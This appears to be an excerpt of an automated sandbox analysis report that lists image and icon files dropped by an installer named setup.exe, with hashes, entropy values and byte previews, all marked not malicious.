                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:12B5C5D7C43111EB81D1C3E968FDC210" xmpMM:InstanceID="xmp.iid:12B5C5D6C43111EB81D1C3E968FDC210" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:268ff5cb-d2ed-6d49-9e2f-bcda4eb9e534" stRef:documentID="adobe:docid:photoshop:00a5e90d-efab-ed45-b550-e54ac9ab0589"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.scale125.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5714
                                                                                                                                                                            Entropy (8bit):7.427515682473523
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:g8h6ZVa8lNgYZMlOIdrPf1XkgrieyIGkJcFm2qkC:Z18MYmQ27lDGLLqkC
                                                                                                                                                                            MD5:479576299075C0B85E0DE2AFE4040C25
                                                                                                                                                                            SHA1:3FF55DD79D8E4CAFA2F8755C90D14524DC75C8EE
                                                                                                                                                                            SHA-256:3C081097DCA98557B27C1949496CEDC94F1B8F6A952D6B106E312E0239BC5B21
                                                                                                                                                                            SHA-512:32C30E0B8AD608639182F5BE3A4064B15D35975D7E920E9A0B020F9F0CF32C81B6CD33E63240B828800AD2452E3A28330666C3D584ECEB1D45C2DD25E2F0E19A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:4307CEF6C43611EBAC93D939A9EF7781" xmpMM:InstanceID="xmp.iid:4307CEF5C43611EBAC93D939A9EF7781" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:527f7179-62ac-ab45-8182-1dce9a7722ea" stRef:documentID="adobe:docid:photoshop:ca709772-3d5f-cc4c-9d43-6e0acd2d058f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.scale150.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9319
                                                                                                                                                                            Entropy (8bit):7.352172078179043
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:Pp8Szx7Uw+7PL209joqlIZ6remeV81MCoOLqTrz:Pp8WJj8L209rKyp3qVOLqfz
                                                                                                                                                                            MD5:A766139160C43AF73563ADBD3A38BD5F
                                                                                                                                                                            SHA1:37A3817C61ED5516B6BBFE4D6CC458E166CE4D0A
                                                                                                                                                                            SHA-256:0416B1888148611C4716CBBE253C8F73F075E4F926C3CC4F93D38D230EF7B4A1
                                                                                                                                                                            SHA-512:B358D75846A7DEDB32640887C2DD45EDFB1A0D9A4A8735E6446E101FC1778A0E5625B40C3108AFF1A79BFFD2AA92175BD5A75BF70D1F3B30582033B5BB68FE63
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:754F24FEC43611EBA0F3E80E8A722147" xmpMM:InstanceID="xmp.iid:754F24FDC43611EBA0F3E80E8A722147" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9ed5958a-829f-8d41-819e-bb85dbea462c" stRef:documentID="adobe:docid:photoshop:69d85e66-65a5-be4b-a47a-755d1e30ff1e"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.scale200.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):22946
                                                                                                                                                                            Entropy (8bit):6.920504108797511
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:I8gCPeBbgnF6tldimQ4PWuug1S2iwoIy/SPO7sfvzoFVmft7LHlwor:I83WBbQF6rUg1S2iww/Afv0FVml7ior
                                                                                                                                                                            MD5:38AD4B10AC19A240D93E04D383822381
                                                                                                                                                                            SHA1:4AF7AD089328DCCCDDA6886A94D7E7CD638F359F
                                                                                                                                                                            SHA-256:033171062CD540EC84CE4998719D0DCAE564AA69646D437DC4DC4CD8EFD0F6FA
                                                                                                                                                                            SHA-512:6FAEDB94FAB28C896B95E36C6A2C8E9B42BC41AB1650F2A6E2175B70511C0881448796F62760FFB3DD49B95048C6C45FFD68C73225AF5F2EC9A1003C59E6984E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="3F35745A47965A573D5A396B9C00A40A" xmpMM:DocumentID="xmp.did:8DC6B99CC43611EBB055D3E33959867C" xmpMM:InstanceID="xmp.iid:8DC6B99BC43611EBB055D3E33959867C" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6dc45cf6-c34f-e34b-a9ec-e44001e82373" stRef:documentID="adobe:docid:photoshop:08f061d6-4477-2940-952a-017ed102d655"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\banner.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28870
                                                                                                                                                                            Entropy (8bit):4.29697375737841
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:0PQxoVfMd6xviLJGSinZ1IHVRe0lnh/dbsX5JS:0Ja64sSQZ1IAJY
                                                                                                                                                                            MD5:A92209231C43A871925D546C6DC5C244
                                                                                                                                                                            SHA1:15B5F39938FF9718EEF83862F4EE1F6E7272E1D3
                                                                                                                                                                            SHA-256:865B031B2C344B5558F7712E1424251631247C86A7D835AE263AD948016A35A0
                                                                                                                                                                            SHA-512:B6C817AECA982C1FD11BCAF7D59E20E3E0BE34FBE8E37AB8223FD240A3E96135218BFCA6379F966FF3A22AF795FFBBF5A94FF0FB0219A19D1FDDA4321EDA2659
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 25.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_8" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 500 59" enable-background="new 0 0 500 59" xml:space="preserve">..<rect x="-0.3" display="none" fill="#FFFFFF" width="500.4" height="59"/>..<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="452.55" y1="72.994" x2="452.55" y2="1.6686" gradientTransform="matrix(1 0 0 -1 0 60)">...<stop offset="0.0017" style="stop-color:#06409A"/>...<stop offset="0.1268" style="stop-color:#133F96"/>...<stop offset="0.358" style="stop-color:#353D8C"/>...<stop offset="0.6699" style="stop-color:#6C397C"/>...<stop offset="1" style="stop-color:#AE3569"/>..</linearGradient>..<rect x="405.1" fill="url(#SVGID_1_)" width="94.9" height="59"/>..<g opacity="0.15">.......<linearGradient id="SVGID_2_" gradientUnits="userSpaceO

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\cmdlinkarrow

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2862
                                                                                                                                                                            Entropy (8bit):3.160430651939096
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:QFFZ+f+zd+kHeNTM9/+Xz++++++++YWWS0i6I:QFFEw4Xc+D++++++++ypi9
                                                                                                                                                                            MD5:983358CE03817F1CA404BEFBE1E4D96A
                                                                                                                                                                            SHA1:75CE6CE80606BBB052DD35351ED95435892BAF8D
                                                                                                                                                                            SHA-256:7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
                                                                                                                                                                            SHA-512:BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..............(...6...........h...^......... .h.......(....... .........................................................................................................................................................wv....."""""o.."""""o..www""......"/.....""......"/......r.........................?...........................................?......(....... ..................................................."..... .". .6.-.9.;.<.;.D.3.,...4...9...O.,.Q.$.M.2.S.:.\.1.U.$._.1.F.G.I.A.`.@.w.q...|...q...{.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\completi

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.57715132031736
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:+728OQ6YxsPq7v8N+2RdHKb80000000000000000000000000MqfqF2Nnnu8jgLe:+72LQWPq7vEFXVCVKuM4expgz
                                                                                                                                                                            MD5:C23AF89757665BC0386FD798A61B2112
                                                                                                                                                                            SHA1:FD4958B62F83EDF6774FCF7C691CC3270B82AA0B
                                                                                                                                                                            SHA-256:031ED0378F819926D7B5B2C6C9367A0FB1CBAE40E1A3959E2652FE30A47D52F2
                                                                                                                                                                            SHA-512:5727ABA9CD972C8F25B31F2A8E698CA2CAE640427A62A0EA4092FD426B907D39BAF58B8724B6E37965E76BE90EAA329F7D4A7EE4688922ED796D54E4377FC8CC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................................................................................................................................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d..............................................................................................................................................N.k................................................j....Z..............................................................................................................................o.d..........................................................d...s......

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\custicon

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.2912578217465134
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:+728OQ6UfPsw8PX4E0000000000000000000000000rggggj88jgLiqYTqfI0008:+72LQpPswSXtA4vJbvi
                                                                                                                                                                            MD5:BE6D2F48AA6634FB2101C273C798D4D9
                                                                                                                                                                            SHA1:21D1B2E7BCA49FE727E1C3A505E28E609EC53CC7
                                                                                                                                                                            SHA-256:0E22BC2BF7184DFDB55223A11439304A453FB3574E3C9034A6497AF405C628EF
                                                                                                                                                                            SHA-512:8BC2C9789640ED0E6F266FDC27647F7CE510EFE06ED1225BB8510F082E6C009E7911AEC38F21DE405FA68A418513DA2DC541EDB53F4FA6887603596EBD29F463
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%....................................................................................................................................................................................................................................................................................................x...t..f..f..t.....x...".......................................................................................................................................................d................................d..............................................................................................................................................N.k................................................j....Z..............................................................................................................................o.d..........................................................d...s......

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):12626
                                                                                                                                                                            Entropy (8bit):7.450344831364431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:zBi8rcWUMevBUahRXMHd0q3vkf6kx2DJIQ4EALOCwTx5D+CM96qdGi131:48IzMiBUaEHdp3vkCXuQ4pnH1dGiz
                                                                                                                                                                            MD5:5F6253CFF5A8B031BFB3B161079D0D86
                                                                                                                                                                            SHA1:7645B13610583FB67247C74CF5AF08FF848079E7
                                                                                                                                                                            SHA-256:36D9BAB35D1E4B50045BF902F5D42B6F865488C75F6E60FC00A6CD6F69034AB0
                                                                                                                                                                            SHA-512:D1FDC364BEDF931512000FBF05E854D5ACECCB48ABB9EC49E68476A5DC2907267490290D92ACBB267FFB7BDBA9B7A1C88F1EB77830CF953443F4624995DABDC3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:FEF08EB1C43011EB94B9F7A7E9A94910" xmpMM:InstanceID="xmp.iid:FEF08EB0C43011EB94B9F7A7E9A94910" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e614fedb-25db-5740-b976-753b5fbc3679" stRef:documentID="adobe:docid:photoshop:4c1a3bc8-b220-ab4a-8972-fc04083d2ebd"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.scale125.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16673
                                                                                                                                                                            Entropy (8bit):7.308169831606533
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S8rDbRvc6xM8F3YSzXnN4kjwazD9iV3CUzy3FqI4Oj:S8rDtvc6n1YKN42DUV3i3FKg
                                                                                                                                                                            MD5:A6CC6F0799276EC0C0B8704FDC91236B
                                                                                                                                                                            SHA1:CC5671B0B3F3CD3E17FB4D9C916A32547090528A
                                                                                                                                                                            SHA-256:557059C8C0488F9F9681A16AC5448BA8470321CF40E63526499C5151177D59A7
                                                                                                                                                                            SHA-512:A474848F1BA8BE2CF7DEC2E5EE75E6091C9712C42D8F2775000412FF1652D2E9D282602FB3E413BDA01E34FBAF113C4B140715B1AEB48BF9583BA303EECD8969
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:61B7B381C43711EBA3CAD5AB122A08BF" xmpMM:InstanceID="xmp.iid:61B7B380C43711EBA3CAD5AB122A08BF" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e777c167-6c3b-8b45-ba8b-bf8f7256b6c0" stRef:documentID="adobe:docid:photoshop:84aff0ee-2a1f-f449-9eac-0bf010aafe17"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.scale150.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):27770
                                                                                                                                                                            Entropy (8bit):7.0636804814851875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:d8DRDaplr71odDiC/tVJ3htS3qcr97VgiU/:0EjH21nJHS3qc57tE
                                                                                                                                                                            MD5:DE300C8B0A317B6E29A47FACFA76A6C0
                                                                                                                                                                            SHA1:6576993EE6CF1BDE4845B6303BFF0DA5CB2AE255
                                                                                                                                                                            SHA-256:B82327CBF824FDF633C20B13C19A91FAA950F18C580675F2AB49F8CC7BA77FA4
                                                                                                                                                                            SHA-512:DE5F39E59210C38126444008623B66612CD9B3226B966D0F90D059C8E85525BEC296D9CFE89AB5A2D89EA884A8FC4D6AD9C96FDECA9F22780E3972B2C81DEEEC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:7BE8A297C43711EB8166B4FB14955B7A" xmpMM:InstanceID="xmp.iid:7BE8A296C43711EB8166B4FB14955B7A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:899e2b57-a43b-d647-9323-41ea3680c438" stRef:documentID="adobe:docid:photoshop:50661c56-e161-034b-aab4-d332a6df85b2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.scale200.jpg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):69692
                                                                                                                                                                            Entropy (8bit):6.082855384914949
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Q2gs8VvwWGnkZTwufTZkYAekzvxaYyhzHL:D8V91w+ZnAtjx+zr
                                                                                                                                                                            MD5:816C6B957BD8ED6A79DFA6A1EB9C57A1
                                                                                                                                                                            SHA1:60036B702CBA91E446039C9432898FDE72E7B00D
                                                                                                                                                                            SHA-256:F192D3EC0EC36BDD0614A61851F73714DB8D68900F891760AC30A33C2741D4DD
                                                                                                                                                                            SHA-512:9001244C1D54AEBED9B88BE1BFF12FF65BE6A29C1292AE7FA2DE2BBD4D889D81D3344A9C02262DD9B1F70AFA7F84592EF31799E6F2B1F9477154B53B10104A40
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:91A4FA10C43711EB8B9BAF848460155F" xmpMM:InstanceID="xmp.iid:91A4FA0FC43711EB8B9BAF848460155F" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8f9355ef-3a2e-f044-b70e-4c47f221b2b1" stRef:documentID="adobe:docid:photoshop:94c02c68-8c9f-ce41-9654-6287b20ac7f6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\dialog.svg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):33179
                                                                                                                                                                            Entropy (8bit):4.256250067040064
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:VpZxTZxf525K1Wz9w5HENvBlPdBXqo4yw1ELYO2i:jTZy5KL5wMoHM8
                                                                                                                                                                            MD5:9A3A9D5895B3645C3CCCAA4DD20C2358
                                                                                                                                                                            SHA1:54872FCD8F36757B372A77F61F89209687C3AEE0
                                                                                                                                                                            SHA-256:135CC57F4BBC69C47464D4CF315AD7BA4852FD956D40DD86B6D3FBA3373DF28C
                                                                                                                                                                            SHA-512:B6329658DF74613C3643E28436A7B282C47D0F73A4424D2EC3CA34D33474E2A8E785DDCC05C0AD296A80D8CD6218691A1A2456080942DBFF8CBCD51FC1F6D6B8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 25.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Mono_1_" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 500 316" enable-background="new 0 0 500 316" xml:space="preserve">..<g id="Layer_1_xA0_Image_1_">..</g>..<g id="Rectangle_2_xA0_Image_1_">...<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="81.708" y1="-0.2944" x2="81.708" y2="315.2888">....<stop offset="1.723294e-03" style="stop-color:#06409A"/>....<stop offset="0.1268" style="stop-color:#133F96"/>....<stop offset="0.358" style="stop-color:#353D8C"/>....<stop offset="0.6699" style="stop-color:#6C397C"/>....<stop offset="1" style="stop-color:#AE3569"/>...</linearGradient>...<rect x="0.1" y="-0.3" fill="url(#SVGID_1_)" width="163.1" height="317"/>..</g>..<g id="app_x5F_logo_xA0_Image_1_">...<g opacity="0.15">....<defs>.....<rect id="SVGID_2_"

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\exclamic

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.486912391627119
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+jsnrGWGIxANQAI2DZ4uHnIdUsbTgvCh3gs//oUvz4tbr4/w:+YzxkQAj4eIdqv8T//3+bsw
                                                                                                                                                                            MD5:3FBB7DDBC13EDF109E3ACAA7A4A69A4E
                                                                                                                                                                            SHA1:BF53201D998ED6E6F2E07584EFDA9585113AEB0E
                                                                                                                                                                            SHA-256:F8429073C7A83377AD754824B0B81040D68F8C1350A82FF4DCCF8BC4BF31F177
                                                                                                                                                                            SHA-512:CF818A9E88002D373019C0F3C9AF1BE27F20E074C662973898724124EC40F95CEC89F73D4A2F693C73D63981109EFB135057DEEC9245865C3F6351C128AB93D2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......%......................................................................................................................................................................................................................_....w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w..I..............2.w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w...w.....J............S....w..4...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...;....w..>......................?.w......Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y...Y.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_left.bmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
